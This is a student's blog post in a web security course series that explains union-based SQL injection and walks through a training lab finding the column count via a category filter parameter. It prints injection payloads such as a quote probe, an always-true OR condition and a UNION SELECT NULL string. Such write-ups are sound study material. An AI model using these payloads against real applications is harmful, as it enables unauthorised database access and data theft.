Skip to main content
  1. Research & Techical Notes/

SQL Injection - SQL Injection UNION Attacks

·688 words·4 mins
Nguyen Hoang Thanh Phong
Author
Nguyen Hoang Thanh Phong
Senior Information Assurance student at FPT University. Focused on Web vulnerability exploitation, AWS Security Architecture, and building automated penetration tooling
Web Security IAW301 - This article is part of a series.
Part 9: This Article

Q&A
#

1. What is a Union-Based SQL Injection attack, and how does it differ from other types of SQL injection attacks?
#

Union-Based SQL Injection is a type of SQL Injection attack in which an attacker uses the UNION SQL operator to append one or more malicious SELECT queries to the original query used by the web application.

This technique is effective when the application displays the results of the SQL query in its HTTP response. In that case, the attacker can make the application return data from other database tables and display it on the web page.

Union-Based SQL Injection differs from other types of SQL Injection because it focuses on extracting data directly through the application’s visible response. In contrast, Blind SQL Injection usually requires the attacker to infer information based on true/false responses or response timing because the application does not directly display the query results.

2. Explain the role of the UNION SQL operator in this type of attack and how it can be used to extract data from a database that is not typically accessible through the intended use of a web application.
#

The UNION SQL operator is used to combine the results of two or more SELECT queries into a single result set. In a Union-Based SQL Injection attack, the attacker injects a UNION SELECT statement into a vulnerable parameter so that the database executes both the original query and the attacker’s additional query.

For example, if a web application is designed to display product information, an attacker may use UNION SELECT to retrieve data from another table, such as a users table. This allows the attacker to make the application display information that would not normally be accessible through its intended functionality, such as usernames or passwords.

To perform this attack successfully, the attacker must usually determine the correct number of columns returned by the original query. The injected UNION SELECT query must return the same number of columns, and the data types must be compatible with the original query.

SQL Injection UNION Attack: Determining the Number of Columns Returned by the Query
#

1. Accessing the lab
#

This lab requires us to perform a SQL Injection UNION attack in order to determine the number of columns returned by the original SQL query. The objective is to inject a row containing NULL values using the UNION SELECT operator.

First, I accessed the lab homepage.

Homepage

2. Testing the vulnerable parameter
#

At first, I did not know which parameter was vulnerable to SQL Injection. Based on the URL structure, the application uses the /filter endpoint with the category parameter, for example:

1
/filter?category=Pets

To test whether the category parameter was vulnerable, I added a single quote after the value Pets:

1
/filter?category=Pets'

After adding the single quote, the application returned an Internal Server Error. This indicated that the input was being processed inside a SQL query and that the query syntax was broken by the injected quote.

Internal Server Error

3. Confirming SQL Injection
#

Next, I tested a basic SQL Injection condition by adding an always-true condition:

1
Pets' OR '1'='1

The page returned to a normal state and displayed product results. This confirmed that the category parameter was vulnerable to SQL Injection.

SQL Injection at category parameter

4. Determining the number of columns
#

After confirming the SQL Injection vulnerability, I used the UNION SELECT technique with NULL values to determine the number of columns returned by the original query.

I tested the following payload:

1
Pets' UNION SELECT NULL,NULL,NULL-- -

The lab was solved when I used three NULL values. This means that the original SQL query returned three columns, and the injected UNION SELECT query matched the required number of columns.

Success

Conclusion
#

In this lab, I successfully identified a SQL Injection vulnerability in the category parameter of the /filter endpoint. By injecting a single quote, I triggered a server-side SQL error. Then, I confirmed the vulnerability using an always-true condition.

Finally, I used a Union-Based SQL Injection payload with three NULL values:

1
' UNION SELECT NULL,NULL,NULL-- -

This successfully determined that the original query returned three columns and completed the lab.

Web Security IAW301 - This article is part of a series.
Part 9: This Article